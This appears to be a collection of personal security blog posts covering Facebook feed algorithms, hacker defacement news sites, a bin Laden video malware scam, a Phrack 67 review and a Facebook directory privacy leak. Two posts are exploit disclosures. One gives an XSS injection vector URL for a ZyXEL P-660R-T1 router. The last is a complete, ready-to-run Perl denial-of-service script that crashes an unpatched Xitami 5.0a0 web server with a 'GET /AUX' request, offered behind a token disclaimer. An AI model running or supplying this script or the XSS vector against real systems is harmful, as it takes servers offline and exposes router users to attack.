Facebook Intelligence Or Deception

 

Today I would like to tell you some thing that I noticed a while back in our favorite hangout spot , Facebook ! In today’s world there is nothing that can be called plain and simple.Every thing from Google Search results to Facebook’s friends feeds , are controlled by Algorithms that basically, in simple words control how you see the information.

In Facebook what happens is that it detects and stores your Clicks. Clicks could be any thing ranging from clicking on the like button on some friend’s video or status or comment.Similarly it creates trends of users , for example usually you see that the advertisements shown on your home page are different then that of your friend’s home page. This was harmless and sometimes helped the user to find something of interest in those ads.

Now the scary part. Currently in Facebook what is happening is that those friends with whom u get out of touch on Facebook as in don’t tag them or post any thing on their wall or perform any kind of activity , are automatically removed from the news feeds on your home page.That is you wont see any updates from that friend and you would think that the friend is not using his/her’s Facebook. When in actuality Facebook decided for you whom to see in your feeds and whom not to see.

So I am forced to ask that is Facebook becoming intelligent or is it deceiving us?

Now this for you all to decide!

Peace !!!


Cyber Deception

Cyber Deception has alot of meanings but in this context this means that  hackers start deceiving the government by creating Underground websites or Hackers news websites. These websites show that they are just finding updated news and posting it but  reality is actually somewhat different.You must have heard about the phrase MAKING THE NEWS. Well this is what these groups believe in.

The most Prominent of all is created by the guy who is the part of Indian Cyber Army (unofficial) called The Hacker News and what happens is that they deface any high valued website of Pakistan or around the world and then posts it onto their website as a news. Though they also post websites posted by other hackers but maximum websites posted by hacker news are by the Indian Cyber Army(unofficial).

The funny thing is that most of the lists are fake.Some times they deliberately give links of some website ,which is their target , as a challenge ,thus they dont have to get their hands dirty and the server gets compromised.

An Indian Hacker called Zero , compromised servers of Pakistan and posted the list onto yet another site : Voice of Grey hat

The Strangest thing is that China , Russia and many other countries have created their Cyber Armies.Some of the hackers which are the part of these Cyber Armies start these kinds of websites which is by law totally wrong.

These were some examples of Cyber Deception , there are many more.

Peace out!!!


OSAMA BIN LADEN Scams and Spams

 The scam is currently spreading like a virus on Facebook. The video claims the death of OSAMA BIN LADEN uncensored. And because of that many people are clicking on the link and getting infected.

Infection is pretty easy you watch the video , it has an embedded malware attached to it and it gets downloaded and executed on your PC. On the other hand how its spreading is that when you click on the link it takes you to a rogue application and then the application gets the list of your facebook friends and starts posting the video link on the wall of your friends.

These kinds of events are paradise for Scammers , Spammers , Crackers etc. The best thing to protect ones self is to either use a very good AV in combination with a great antiMalware software and a personal firewall.

Again I would recommend not to click on any link related to OSAMA’s Death.

Peace.


ZyXEL P-660R-T1 V2 XSS Zeroday Vulnerability

I recently found a vulnerability in Zyxel P-660R T1 . Although the impact factor is quite low as it is an XSS (Cross site scripting) but still  a vulnerability is a vulnerability .

Xc0re Security Research Group

Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]

Exploit:

VECTOR : http://IP/Forms/home_1?&HomeCurrent_Date=‘ XSS Vector ‘01%2F01%2F2000

This works with the post request too ! As by default this value is sent through POST request.

Author : Usman Saeed , Xc0re Security Research Group.

 

 


Phrack 67 !!


Phrack is one of  THE best hacking E-zines in the world !! Phrack’s 67th issue just released ! The most awaited release was a very big disappointment ! Phrack was and is known for its new technically super rich content about the Hidden networks, Compromising new technologies etc but this release was , except a few articles , very basic. For instance an awesome article on ProFTPd rooting but it was for an old version infact a very old version of the Software which was a bummer because getting your hands on a zero-day for proftpd would have been awesome ! 😀

Phrack team had alot of problem (apparently) before the release of this Issue of Phrack !  I dont know the exact issues but still they delayed it many times.  The whole team is different for issue 67 ! Maybe that was the problem ? Well the authors of Phrack 67 would be knowing that better.

All in all it was an ok release ! But if compared with the past releases , it was nothing !! I hope another issue comes out soon ! Maybe even this year 😀 !

Peace !


Facebook Attack

Hey all ,

I was browsing through the net when I came across a Blog , which stated “Return of the Facebook Snatchers” . So naturally I opened the page and found , the ultimate breach of privacy for the Facebook Users !

Any one , even the users not registered at facebook can see the whole list of Users globally ! That is those profiles which are set to be found in their privacy list ! Check the Facebook Directory .

The original Blog is at : Skull Security.

It is very serious people !!


Xitami/5.0a0 Webserver Denial Of Service Vulnerability

################################################
# Name : Xitami/5.0a0 Denial Of Service
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: 10/05/10
# Tested on Windows 7 !
################################################

Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]

[*] Download Page : http://www.xitami.com

[*] Attack type : Remote

[*] Patch Status : Unpatched

[*] Description : By sending a crafted GET request [GET /AUX HTTP/1.0] to the server , the server crashes !

[*] Exploitation :

#!/usr/bin/perl
# Xitami/5.0a0 Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [10/05/10]

$host = $ARGV[0];
$PORT = $ARGV[1];

$packet = “AUX”;

$stuff = “GET /”.$packet.” HTTP/1.0\r\n\r\n”;

use IO::Socket::INET;
if (! defined $ARGV[0])
{
print “+========================================================+\n”;
print “+ Program [Xitami/5.0a0 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [10/05/10] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n”;
print “+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;

exit;
}

$sock = IO::Socket::INET->new( Proto => “tcp”,PeerAddr => $host , PeerPort => $PORT) || die “Cant connect to $host!”;
print “+========================================================+\n”;
print “+ Program [Xitami/5.0a0 Denial Of Service] +\n”;
print “+ Author [Usman Saeed] +\n”;
print “+ Company [Xc0re Security Research Group] +\n”;
print “+ DATE: [10/05/10] +\n”;
print “+ Usage :perl sploit.pl webserversip wbsvrport +\n”;
print “+ Disclaimer: [This code is for Educational Purposes , +\n”;
print “+ I would Not be responsible for any misuse of this code]+\n”;
print “+========================================================+\n”;

print “\n”;

print “[*] Initializing\n”;

sleep(2);

print “[*] Sendin DOS Packet \n”;

send ($sock , $stuff , 0);
print “[*] Crashed 🙂 \n”;
$res = recv($sock,$response,1024,0);
print $response;

exit;